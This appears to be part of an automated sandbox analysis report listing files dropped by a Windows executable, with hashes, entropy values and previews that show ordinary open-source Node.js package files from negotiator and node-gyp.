              Malicious:false
              Reputation:unknown
              Preview:0.6.3 / 2022-01-22.==================.. * Revert "Lazy-load modules from main entry point"..0.6.2 / 2019-04-29.==================.. * Fix sorting charset, encoding, and language with extra parameters..0.6.1 / 2016-05-02.==================.. * perf: improve `Accept` parsing speed. * perf: improve `Accept-Charset` parsing speed. * perf: improve `Accept-Encoding` parsing speed. * perf: improve `Accept-Language` parsing speed..0.6.0 / 2015-09-29.==================.. * Fix including type extensions in parameters in `Accept` parsing. * Fix parsing `Accept` parameters with quoted equals. * Fix parsing `Accept` parameters with quoted semicolons. * Lazy-load modules from main entry point. * perf: delay type concatenation until needed. * perf: enable strict mode. * perf: hoist regular expressions. * perf: remove closures getting spec properties. * perf: remove a closure from media type parsing. * perf: remove property delete from media type parsing..0.5.3 / 2015-05-10.===========
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1177
              Entropy (8bit):5.190424654953496
              Encrypted:false
              SSDEEP:
              MD5:6417A862A5E35C17C904D9DDA2CBD499
              SHA1:73FEC64FD8A5CEDDBF65F705987A547C3678D981
              SHA-256:553D4D20029A24E315B428A1A54A9E109EAA340F2E958A4F50A92362C2C4070B
              SHA-512:715C695587A028733A092DB12C8CF2986AC745D2D2F958961DAA8F9B9457744BE63C9521C0D34B594BB4E0884A00C5E41E19BEB9666E426511863C2D8241C334
              Malicious:false
              Reputation:unknown
              Preview:(The MIT License)..Copyright (c) 2012-2014 Federico Romero.Copyright (c) 2012-2014 Isaac Z. Schlueter.Copyright (c) 2014-2015 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGE
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2451
              Entropy (8bit):4.818099111813789
              Encrypted:false
              SSDEEP:
              MD5:279D02856C1815CE3B6745EE234A91AE
              SHA1:D2DCE41C415F88B5BB49939290D542BEF8EC598D
              SHA-256:4F9279BCFFC74199C671739F2D0E91FE5176A7F7E4683CA59809A50463A842BD
              SHA-512:3751B886D3F78D0BE1E5010B6086B0DF1175F85D52A75A11E9F09232BC35EDDB8E92DEE4F219B705F98A23C05EAEBB79C414D4F57C9FC7EF1E3E831E41E1BCAF
              Malicious:false
              Reputation:unknown
              Preview:/*!. * negotiator. * Copyright(c) 2012 Federico Romero. * Copyright(c) 2012-2014 Isaac Z. Schlueter. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';..var preferredCharsets = require('./lib/charset').var preferredEncodings = require('./lib/encoding').var preferredLanguages = require('./lib/language').var preferredMediaTypes = require('./lib/mediaType')../**. * Module exports.. * @public. */..module.exports = Negotiator;.module.exports.Negotiator = Negotiator;../**. * Create a Negotiator instance from a request.. * @param {object} request. * @public. */..function Negotiator(request) {. if (!(this instanceof Negotiator)) {. return new Negotiator(request);. }.. this.request = request;.}..Negotiator.prototype.charset = function charset(available) {. var set = this.charsets(available);. return set && set[0];.};..Negotiator.prototype.charsets = function charsets(available) {. return preferredCharsets(this.request.headers['accept-charset'], available)
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3081
              Entropy (8bit):4.842295755350585
              Encrypted:false
              SSDEEP:
              MD5:7977A65B1542FA8CE9650E58607F4B07
              SHA1:BF9F25A7BF6DC2176B70BC9DA04FC162BDFBF4C4
              SHA-256:E6522A2DF58F21A6CDF8D146F7E85B9A49BCAF68B813DEC15068A8E84FC582C3
              SHA-512:6C5B88F2F56099018F13E40F0C675352271E63E928B03CD25630BDA95059E5C289C78752947DC29E309E66264173D6CED7CC63FCBF0518E955BA12A2BABF5396
              Malicious:false
              Reputation:unknown
              Preview:/**. * negotiator. * Copyright(c) 2012 Isaac Z. Schlueter. * Copyright(c) 2014 Federico Romero. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = preferredCharsets;.module.exports.preferredCharsets = preferredCharsets;../**. * Module variables.. * @private. */..var simpleCharsetRegExp = /^\s*([^\s;]+)\s*(?:;(.*))?$/;../**. * Parse the Accept-Charset header.. * @private. */..function parseAcceptCharset(accept) {. var accepts = accept.split(',');.. for (var i = 0, j = 0; i < accepts.length; i++) {. var charset = parseCharset(accepts[i].trim(), i);.. if (charset) {. accepts[j++] = charset;. }. }.. // trim accepts. accepts.length = j;.. return accepts;.}../**. * Parse a charset from the Accept-Charset header.. * @private. */..function parseCharset(str, i) {. var match = simpleCharsetRegExp.exec(str);. if (!match) return null;.. var charset = match[1];. var q = 1;. if (matc
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3506
              Entropy (8bit):4.858041738762427
              Encrypted:false
              SSDEEP:
              MD5:E03DD226452C58CE083AB4468851F0B1
              SHA1:6066E153BCAC0D060CD2E475DDAD0E239422AA0D
              SHA-256:35421DC78D3C1B608922427BBD6E524518168621FF1A44919FC591CA297E813C
              SHA-512:F1966A345F3380075325952275A6AC0668FEA52AE4CAAD431D8AB9068AFE1A3C17B62D2BE0DD9E19B48D843ECF3A58F94DBD52240A69234A2B232044468CD86F
              Malicious:false
              Reputation:unknown
              Preview:/**. * negotiator. * Copyright(c) 2012 Isaac Z. Schlueter. * Copyright(c) 2014 Federico Romero. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = preferredEncodings;.module.exports.preferredEncodings = preferredEncodings;../**. * Module variables.. * @private. */..var simpleEncodingRegExp = /^\s*([^\s;]+)\s*(?:;(.*))?$/;../**. * Parse the Accept-Encoding header.. * @private. */..function parseAcceptEncoding(accept) {. var accepts = accept.split(',');. var hasIdentity = false;. var minQuality = 1;.. for (var i = 0, j = 0; i < accepts.length; i++) {. var encoding = parseEncoding(accepts[i].trim(), i);.. if (encoding) {. accepts[j++] = encoding;. hasIdentity = hasIdentity || specify('identity', encoding);. minQuality = Math.min(minQuality, encoding.q || 1);. }. }.. if (!hasIdentity) {. /*. * If identity doesn't explicitly appear in the accept-encoding header,.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3409
              Entropy (8bit):4.93193307417238
              Encrypted:false
              SSDEEP:
              MD5:F10E434AE4EED2D3D46FF47582ED9938
              SHA1:248BAA661B5CD4A4368E1DE987A5A911636C41AB
              SHA-256:4AEBB44DA06094F2D56F0B20B4FBDD542CDA00A4C9295E10BBE55203701C9024
              SHA-512:D7BAC6E2CE28525D67E0B8EFF4E2FE1868D11EC69F98C310C1E6258504BCDEFCECACE967A7721FDEABD93AA18D0D40D1BFE54DCEDF0991ED12119AF8BDE74490
              Malicious:false
              Reputation:unknown
              Preview:/**. * negotiator. * Copyright(c) 2012 Isaac Z. Schlueter. * Copyright(c) 2014 Federico Romero. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = preferredLanguages;.module.exports.preferredLanguages = preferredLanguages;../**. * Module variables.. * @private. */..var simpleLanguageRegExp = /^\s*([^\s\-;]+)(?:-([^\s;]+))?\s*(?:;(.*))?$/;../**. * Parse the Accept-Language header.. * @private. */..function parseAcceptLanguage(accept) {. var accepts = accept.split(',');.. for (var i = 0, j = 0; i < accepts.length; i++) {. var language = parseLanguage(accepts[i].trim(), i);.. if (language) {. accepts[j++] = language;. }. }.. // trim accepts. accepts.length = j;.. return accepts;.}../**. * Parse a language from the Accept-Language header.. * @private. */..function parseLanguage(str, i) {. var match = simpleLanguageRegExp.exec(str);. if (!match) return null;.. var prefix = mat
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5358
              Entropy (8bit):4.867691098214956
              Encrypted:false
              SSDEEP:
              MD5:0FDAA0ED7CAB2CE5FCBD7B361A85892C
              SHA1:9FE7D1F6570E870BF5A90ADA7BA1A7A53480F5CC
              SHA-256:0DAB239C924FA4D5F823548E25DC9F10315BF490B821827B640318B7AA200577
              SHA-512:44BFBECB293939BC5DF1B98C483FC01F36640DE15225D936B919F733A202CCDDA2F727F5543853DE6E541157BDDE8BF57F9CFC918E0EAD1B990569E1779A7BA7
              Malicious:false
              Reputation:unknown
              Preview:/**. * negotiator. * Copyright(c) 2012 Isaac Z. Schlueter. * Copyright(c) 2014 Federico Romero. * Copyright(c) 2014-2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict';../**. * Module exports.. * @public. */..module.exports = preferredMediaTypes;.module.exports.preferredMediaTypes = preferredMediaTypes;../**. * Module variables.. * @private. */..var simpleMediaTypeRegExp = /^\s*([^\s\/;]+)\/([^;\s]+)\s*(?:;(.*))?$/;../**. * Parse the Accept header.. * @private. */..function parseAccept(accept) {. var accepts = splitMediaTypes(accept);.. for (var i = 0, j = 0; i < accepts.length; i++) {. var mediaType = parseMediaType(accepts[i].trim(), i);.. if (mediaType) {. accepts[j++] = mediaType;. }. }.. // trim accepts. accepts.length = j;.. return accepts;.}../**. * Parse a media type from the Accept header.. * @private. */..function parseMediaType(str, i) {. var match = simpleMediaTypeRegExp.exec(str);. if (!match) return null;.. var params = Object.create(n
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):993
              Entropy (8bit):4.782116934931483
              Encrypted:false
              SSDEEP:
              MD5:5D2BC8AE77831203C6D0CE3A17E599CF
              SHA1:3C1B22E6ECAE04B514912326957E6A205B015098
              SHA-256:8672E91F7395CE51EC789D883D7F7D872A40847BB83A6A3F89C3D1DED39E55D9
              SHA-512:C22AD9D7E1C091B26CA5ABCB7F6E7338EB79BD36E1228DAD9EC6903C9922A2451F518C21507CC82DCCD69BE13132368DE7EFCAD1DE7BA56270C7997DECF3A1AA
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "negotiator",. "description": "HTTP content negotiation",. "version": "0.6.3",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Federico Romero <federico.romero@outboxlabs.com>",. "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)". ],. "license": "MIT",. "keywords": [. "http",. "content negotiation",. "accept",. "accept-language",. "accept-encoding",. "accept-charset". ],. "repository": "jshttp/negotiator",. "devDependencies": {. "eslint": "7.32.0",. "eslint-plugin-markdown": "2.2.1",. "mocha": "9.1.3",. "nyc": "15.1.0". },. "files": [. "lib/",. "HISTORY.md",. "LICENSE",. "index.js",. "README.md". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --check-leaks --bail test/",. "test-ci": "nyc --reporter=lcov --reporter=text npm test",. "test-cov": "nyc --reporter=html --reporter=text npm test". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1383
              Entropy (8bit):4.568999414482016
              Encrypted:false
              SSDEEP:
              MD5:FBFC75DE637244191E8A1B9C63845D8D
              SHA1:CF1AD7970DBB74D79E739821E6FA4A32C40A6AAA
              SHA-256:4C74E3D427FB2071182307B6850F686082D0BB0AB2D691BDBB8939F731A8C9CB
              SHA-512:A7CD9093299909D74A7EEF1746B792FA08E575585F27F2B8631219418EBD8C88FD96215C86023BAD29CC4E52FC23EFE4F1801453E2ACF25B59DA5C169B6DB5CB
              Malicious:false
              Reputation:unknown
              Preview:# Contributing to node-gyp..## Code of Conduct..Please read the.[Code of Conduct](https://github.com/nodejs/admin/blob/master/CODE_OF_CONDUCT.md).which explains the minimum behavior expectations for node-gyp contributors...<a id="developers-certificate-of-origin"></a>.## Developer's Certificate of Origin 1.1..By making a contribution to this project, I certify that:..* (a) The contribution was created in whole or in part by me and I. have the right to submit it under the open source license. indicated in the file; or..* (b) The contribution is based upon previous work that, to the best. of my knowledge, is covered under an appropriate open source. license and I have the right under that license to submit that. work with modifications, whether created in whole or in part. by me, under the same open source license (unless I am. permitted to submit under a different license), as indicated. in the file; or..* (c) The contribution was provided directly to me by some other. person w
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):151
              Entropy (8bit):4.73939808701433
              Encrypted:false
              SSDEEP:
              MD5:2BE1B105CFDBCB125BD278CE48E16C09
              SHA1:81348A39430444900D8B8B92B8195A4F0292CCC2
              SHA-256:40A07F31349A8E6C42298A5BD21AB2DBDC6DC89B6C1D4C2F943096DF822C9C6F
              SHA-512:BA6B34D21B66F56E9B5AE08BB900505675FB75335C7A0E0B403A3154E7B1FA25464051A919833CEF18A764E6B340A44AFD25C4FC3CD91E7ACB0870116E640A36
              Malicious:false
              Reputation:unknown
              Preview:If you believe you have found a security issue in the software in this.repository, please consult https://github.com/nodejs/node/blob/HEAD/SECURITY.md.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5940
              Entropy (8bit):4.523787172512809
              Encrypted:false
              SSDEEP:
              MD5:A6B18B5ADBEDE10D0A47395D06723563
              SHA1:EE24E603A21439865439D5296B82818DD584D2D4
              SHA-256:BEA608AF5DF33C6EF5677C7B0EC0909456683D0B57D5AD84C036AC5BEA4E3BAD
              SHA-512:A7CC45931D68A4E316CDB35AC3A6432E33607C3EF3BC7457384418AF2748629CCEB1DB82EF68F534E4B322AD2F41C6A184129E4D5019E530AE95F954C2F0655F
              Malicious:false
              Reputation:unknown
              Preview:{. 'variables' : {. 'node_engine_include_dir%': 'deps/v8/include',. 'node_host_binary%': 'node',. 'node_with_ltcg%': 'true',. },. 'target_defaults': {. 'type': 'loadable_module',. 'win_delay_load_hook': 'true',. 'product_prefix': '',.. 'conditions': [. [ 'node_engine=="chakracore"', {. 'variables': {. 'node_engine_include_dir%': 'deps/chakrashim/include'. },. }]. ],.. 'include_dirs': [. '<(node_root_dir)/include/node',. '<(node_root_dir)/src',. '<(node_root_dir)/deps/openssl/config',. '<(node_root_dir)/deps/openssl/openssl/include',. '<(node_root_dir)/deps/uv/include',. '<(node_root_dir)/deps/zlib',. '<(node_root_dir)/<(node_engine_include_dir)'. ],. 'defines!': [. 'BUILDING_UV_SHARED=1', # Inherited from common.gypi.. 'BUILDING_V8_SHARED=1', # Inherited from common.gypi.. ],. 'defines': [. 'NODE_GYP_MODULE_NAME=>(_target_name)',. 'USING_UV_SHARED=1',.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):3506
              Entropy (8bit):4.810682225535127
              Encrypted:false
              SSDEEP:
              MD5:811B4D5804C099AA518A886C5440BC18
              SHA1:EB454E91202F8709D482CB009202BD6BA3F29268
              SHA-256:C1E7ADD754A692AB1FCAC69577DAFEB2E5F104AD262E02BE9C8C8A84EEA302C7
              SHA-512:F49236F04E288E757AF47D5E2138E21BCC357287B295CE1CDD5FD42585F17344725110E3F5CD54EB97F2B80B7F46D5AB3229409EBD8C69E176D1BF2C70869422
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node..'use strict'..process.title = 'node-gyp'..const envPaths = require('env-paths').const gyp = require('../').const log = require('npmlog').const os = require('os')../**. * Process and execute the selected commands.. */..const prog = gyp().var completed = false.prog.parseArgv(process.argv).prog.devDir = prog.opts.devdir..var homeDir = os.homedir().if (prog.devDir) {. prog.devDir = prog.devDir.replace(/^~/, homeDir).} else if (homeDir) {. prog.devDir = envPaths('node-gyp', { suffix: '' }).cache.} else {. throw new Error(. "node-gyp requires that the user's home directory is specified " +. 'in either of the environmental variables HOME or USERPROFILE. ' +. 'Overide with: --devdir /path/to/.node-gyp').}..if (prog.todo.length === 0) {. if (~process.argv.indexOf('-v') || ~process.argv.indexOf('--version')) {. console.log('v%s', prog.version). } else {. console.log('%s', prog.usage()). }. process.exit(0).}..log.info('it worked if it ends with', 'ok').l
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3843
              Entropy (8bit):5.028198392069342
              Encrypted:false
              SSDEEP:
              MD5:5E089327BC0884205FDB5B0FF060E1A2
              SHA1:1F891BE0EC57EB9BC19D8DA921C34062A6C5397D
              SHA-256:0E3188D33BF79583705465DE4D94DE6CA67D15C86952BA93CC30390C991D7C28
              SHA-512:2D01DBF55CE877B8C1C147CA1F8F5F3D91AD7F924E18FFA4B92A4220E844B71BD0CA5401143F0249558F47B9DC226A5542FF99B99B3F8A8BDB5812BA6A3FEF02
              Malicious:false
              Reputation:unknown
              Preview:When using `node-gyp` you might see an error like this when attempting to compile/install a node.js native addon:..```.$ npm install bcrypt.npm http GET https://registry.npmjs.org/bcrypt/0.7.5.npm http 304 https://registry.npmjs.org/bcrypt/0.7.5.npm http GET https://registry.npmjs.org/bindings/1.0.0.npm http 304 https://registry.npmjs.org/bindings/1.0.0..> bcrypt@0.7.5 install /home/ubuntu/public/song-swap/node_modules/bcrypt.> node-gyp rebuild..gyp ERR! configure error.gyp ERR! stack Error: "pre" versions of node cannot be installed, use the --nodedir flag instead.gyp ERR! stack at install (/usr/local/lib/node_modules/npm/node_modules/node-gyp/lib/install.js:69:16).gyp ERR! stack at Object.self.commands.(anonymous function) [as install] (/usr/local/lib/node_modules/npm/node_modules/node-gyp/lib/node-gyp.js:56:37).gyp ERR! stack at getNodeDir (/usr/local/lib/node_modules/npm/node_modules/node-gyp/lib/configure.js:219:20).gyp ERR! stack at /usr/local/lib/node_modules/npm
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (377)
              Category:dropped
              Size (bytes):2780
              Entropy (8bit):4.808466289956054
              Encrypted:false
              SSDEEP:
              MD5:84D808B53FF8008CBAADF911B0C86964
              SHA1:FBB73363BE5E903369F9CEC6A45AC7343795AB9A
              SHA-256:C9D962EDCD52D56A850EF05CEC377939956AAA05C2BE86D63FBECF7C92502C42
              SHA-512:22A23E5AF4FCC11398BE23C84F7E0FD2FF8D1A2301B975EE7D874AD3B9E051D3E3115D05BE66285DCADBFFB5FEC829216382BC853EF283FC860BD7E56535353D
              Malicious:false
              Reputation:unknown
              Preview:# Force npm to use global installed node-gyp..**Note: These instructions only work with npm 6 or older. For a solution that works with npm 8 (or older), see [Updating-npm-bundled-node-gyp.md](Updating-npm-bundled-node-gyp.md).**..[Many issues](https://github.com/nodejs/node-gyp/labels/ERR%21%20node-gyp%20-v%20%3C%3D%20v5.1.0) are opened by users who are.not running a [current version of node-gyp](https://github.com/nodejs/node-gyp/releases)...npm bundles its own, internal, copy of node-gyp located at `npm/node_modules`, within npm's private dependencies which are separate from *globally* accessible packages. Therefore this internal copy of node-gyp is independent from any globally installed copy of node-gyp that.may have been installed via `npm install -g node-gyp`...So npm's internal copy of node-gyp **isn't** stored inside *global* `node_modules` and thus isn't available for use as a standalone package. npm uses it's *internal* copy of `node-gyp` to automatically build native addons.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):217
              Entropy (8bit):4.688994871312738
              Encrypted:false
              SSDEEP:
              MD5:8EB352CA40ED1666CDE2D1CCB7251CA1
              SHA1:6DAA6A557B42889B10E17B54DB3CDFFD863E9AA6
              SHA-256:210D05A52CD550B1E0663F8AA1F847428F60258A8BE192DAFC445F6D7FE1E52A
              SHA-512:11FB8E00B7B4DBB634A50F66CEA9201E811B8B69940EA3626F9D73698364DE9E86B6A320DB2E8EF3ED9957A6FE167EB3D9F1EA842CD0BF52FBDBE1388B4F2EBD
              Malicious:false
              Reputation:unknown
              Preview:Welcome to the node-gyp wiki!.. * [["binding.gyp" files out in the wild]]. * [[Linking to OpenSSL]]. * [[Common Issues]]. * [[Updating npm's bundled node-gyp]]. * [[Error: "pre" versions of node cannot be installed]].
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (312)
              Category:dropped
              Size (bytes):3855
              Entropy (8bit):4.650715340392809
              Encrypted:false
              SSDEEP:
              MD5:F2E69DA49EFE75F86525CDE656003298
              SHA1:C5A4BE36CA4FF530F287211288CDF622657B9174
              SHA-256:E609B04E640D2B65BEF8B24C4651D2ACCDC0B3834202F6BAFED0C363905C9ECD
              SHA-512:A8871717E67806F66CDF90200E61385D1992884140263503EA416E4A9BF6D3ED00ECD823E0145DFCFBA58A80AB85221C36C861F2E0B0A7BFDAA1C42CA1599EED
              Malicious:false
              Reputation:unknown
              Preview:A handful of native addons require linking to OpenSSL in one way or another. This introduces a small challenge since node will sometimes bundle OpenSSL statically (the default for node >= v0.8.x), or sometimes dynamically link to the system OpenSSL (default for node <= v0.6.x)...Good native addons should account for both scenarios. It's recommended that you use the `binding.gyp` file provided below as a starting-point for any addon that needs to use OpenSSL:..``` python.{. 'variables': {. # node v0.6.x doesn't give us its build variables,. # but on Unix it was only possible to use the system OpenSSL library,. # so default the variable to "true", v0.8.x node and up will overwrite it.. 'node_shared_openssl%': 'true'. },. 'targets': [. {. 'target_name': 'binding',. 'sources': [. 'src/binding.cc'. ],. 'conditions': [. ['node_shared_openssl=="false"', {. # so when "node_shared_openssl" is "false", then OpenSSL has been. #
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2582
              Entropy (8bit):4.85389516409562
              Encrypted:false
              SSDEEP:
              MD5:4BB0C77BE32FE4C20D364458D4974B64
              SHA1:1B8A30B10A66ABFED3027667CED48182004BB563
              SHA-256:057F8711B46A8B09609A488E4FF4FD2F20A06C1C1C0F235D354B3AA1DEE70555
              SHA-512:B7A954FA3BA07CB6A7C3FDCDE3F09C67262BE88254425034674C710B3468F874F6F8E897BC2AFD15ECC7D86B81559C770C3467BF219BCCD531EF05E6AC607A41
              Malicious:false
              Reputation:unknown
              Preview:# Updating the npm-bundled version of node-gyp..**Note: These instructions are (only) tested and known to work with npm 8 and older.**..**Note: These instructions will be undone if you reinstall or upgrade npm or node! For a more permanent (and simpler) solution, see [Force-npm-to-use-global-node-gyp.md](Force-npm-to-use-global-node-gyp.md). (npm 6 or older only!)**..[Many issues](https://github.com/nodejs/node-gyp/issues?q=label%3A"ERR!+node-gyp+-v+<%3D+v9.x.x") are opened by users who are.not running a [current version of node-gyp](https://github.com/nodejs/node-gyp/releases)...`npm` bundles its own, internal, copy of `node-gyp`. This internal copy is independent of any globally installed copy of node-gyp that.may have been installed via `npm install -g node-gyp`...This means that while `node-gyp` doesn't get installed into your `$PATH` by default, npm still keeps its own copy to invoke when you.attempt to `npm install` a native add-on...Sometimes, you may need to update npm's intern
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (340)
              Category:dropped
              Size (bytes):4747
              Entropy (8bit):4.873217442944314
              Encrypted:false
              SSDEEP:
              MD5:952F304142599AB089ED02A94DD00B00
              SHA1:B56E28E15F5C8EA7DF8F00C7BAC594CDA75DC5CE
              SHA-256:7210D3E71C309CE6B9307F942A1D2BFEE95E3C56C9CE9A5698CA75A47450B081
              SHA-512:334BA615A3DCEF6EA9F2B917B00A65B701F3BBAE91344CADF22E5292A054D2E195ECA323CE3218AAF0E89529B509F8B0F1EB531EAC30CC943F5C8483D03BA605
              Malicious:false
              Reputation:unknown
              Preview:This page contains links to some examples of existing `binding.gyp` files that other node modules are using. Take a look at them for inspiration...To add to this page, just add the link to the project's `binding.gyp` file below:.. * [ons](https://github.com/XadillaX/aliyun-ons/blob/master/binding.gyp). * [thmclrx](https://github.com/XadillaX/thmclrx/blob/master/binding.gyp). * [libxmljs](https://github.com/polotek/libxmljs/blob/master/binding.gyp). * [node-buffertools](https://github.com/bnoordhuis/node-buffertools/blob/master/binding.gyp). * [node-canvas](https://github.com/LearnBoost/node-canvas/blob/master/binding.gyp). * [node-ffi](https://github.com/rbranson/node-ffi/blob/master/binding.gyp) + [libffi](https://github.com/rbranson/node-ffi/blob/master/deps/libffi/libffi.gyp). * [node-time](https://github.com/TooTallNate/node-time/blob/master/binding.gyp). * [node-sass](https://github.com/sass/node-sass/blob/master/binding.gyp) + [libsass](https://github.com/sass/node-sass/blob/mast
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):121
              Entropy (8bit):4.788764941845168
              Encrypted:false
              SSDEEP:
              MD5:EEDD13C1305DB8C82C902E517720C845
              SHA1:6FEB8D1285B83A61D26CBDBFA6776EEBB6DFC0CD
              SHA-256:174F5DA4B3994DF0F4472F4B3107E6ABEC12A75C4813669C298DFBFF6359DB4B
              SHA-512:439DB55B0C5CDB8B62D9D94C7B1BB2657CFD9C3BD3B1851649CEEA60C39C971F979E4EA2BBB7125DDE7AB739CB3F237F7BA6B4DDA0EA56B9223B0FA5BFFC4376
              Malicious:false
              Reputation:unknown
              Preview:[flake8].max-complexity = 101.max-line-length = 88.extend-ignore = E203 # whitespace before ':' to agree with psf/black.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):514
              Entropy (8bit):4.9797494944213865
              Encrypted:false
              SSDEEP:
              MD5:CDF2489283C1985B80676F3833CE33DB
              SHA1:783AA55148417230CB9DE75CCDE8B32E20733566
              SHA-256:C6CDCF0E981A7540553D571B782F8B9650268EE9D63C04A4BC1DAC258A5A2753
              SHA-512:B98700EA21A23221E215B046A6DFC24FA71461771D14BE5B3CA4E4FDE532027C2DB24F8E71EE77BAD84CE3A57CF6B3FB9FCA7318123F53BFE334254108022A5B
              Malicious:false
              Reputation:unknown
              Preview:# Names should be added to this file like so:.# Name or Organization <email address>..Google Inc. <*@google.com>.Bloomberg Finance L.P. <*@bloomberg.net>.IBM Inc. <*@*.ibm.com>.Yandex LLC <*@yandex-team.ru>..Steven Knight <knight@baldmt.com>.Ryan Norton <rnorton10@gmail.com>.David J. Sankel <david@sankelsoftware.com>.Eric N. Vander Weele <ericvw@gmail.com>.Tom Freudenberg <th.freudenberg@gmail.com>.Julien Brianceau <jbriance@cisco.com>.Refael Ackermann <refack@gmail.com>.Ujjwal Sharma <ryzokuken@disroot.org>.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):203
              Entropy (8bit):5.049828116221454
              Encrypted:false
              SSDEEP:
              MD5:E0B6546ACCD51A81841BAD8723209FBE
              SHA1:2C2057BD9967FD37A535A3ED9D2AECB6B20B0A9D
              SHA-256:B42E5A27C9EAD1AEEB7317717D11868D14D7F33AC7E30FB56C294C395F8A7028
              SHA-512:E028A4A0BCFA14C5AF390E599E61DD4C8092EE83C5B9581CB55A0BD1CB5E500D3CA9115A77F86D601172C1E82B260D9CCF1B61D2D14BB8D287D7A6583CACC2C2
              Malicious:false
              Reputation:unknown
              Preview:# Code of Conduct..* [Node.js Code of Conduct](https://github.com/nodejs/admin/blob/HEAD/CODE_OF_CONDUCT.md).* [Node.js Moderation Policy](https://github.com/nodejs/admin/blob/HEAD/Moderation-Policy.md).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1327
              Entropy (8bit):4.587744405281523
              Encrypted:false
              SSDEEP:
              MD5:92CA77CD04D230B0BC08786E7F454B65
              SHA1:E18DDFAB2B734DA4ACDF644A8E3BE342B35C791A
              SHA-256:1C8DC1A35186F807A1DDF2ECE72A420497F51ADFF3BE3C124DBE6EA7EA68441B
              SHA-512:A6F3A73E473DE0CC7DC50F06E0F0647D3A851BCE94DE219A695346F64676E2E0B3B3D86A04FD26F657B8809995C2E5BFD0E351A9CB70EFC05FF31B64D48D0D20
              Malicious:false
              Reputation:unknown
              Preview:# Contributing to gyp-next..## Code of Conduct..This project is bound to the [Node.js Code of Conduct](https://github.com/nodejs/admin/blob/HEAD/CODE_OF_CONDUCT.md)...<a id="developers-certificate-of-origin"></a>.## Developer's Certificate of Origin 1.1..By making a contribution to this project, I certify that:..* (a) The contribution was created in whole or in part by me and I. have the right to submit it under the open source license. indicated in the file; or..* (b) The contribution is based upon previous work that, to the best. of my knowledge, is covered under an appropriate open source. license and I have the right under that license to submit that. work with modifications, whether created in whole or in part. by me, under the same open source license (unless I am. permitted to submit under a different license), as indicated. in the file; or..* (c) The contribution was provided directly to me by some other. person who certified (a), (b) or (c) and I have not modified. i
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1537
              Entropy (8bit):5.145030956681692
              Encrypted:false
              SSDEEP:
              MD5:6CF4F5B9101E7EED6A9D59CAF7AA121F
              SHA1:7F7EA058C7A8C91783D887E8E9EAE1A6DA6B4805
              SHA-256:CA90ABB6ED71DE0774461EF9F928DE33E748B617AEB79F9E52415CF08D69230E
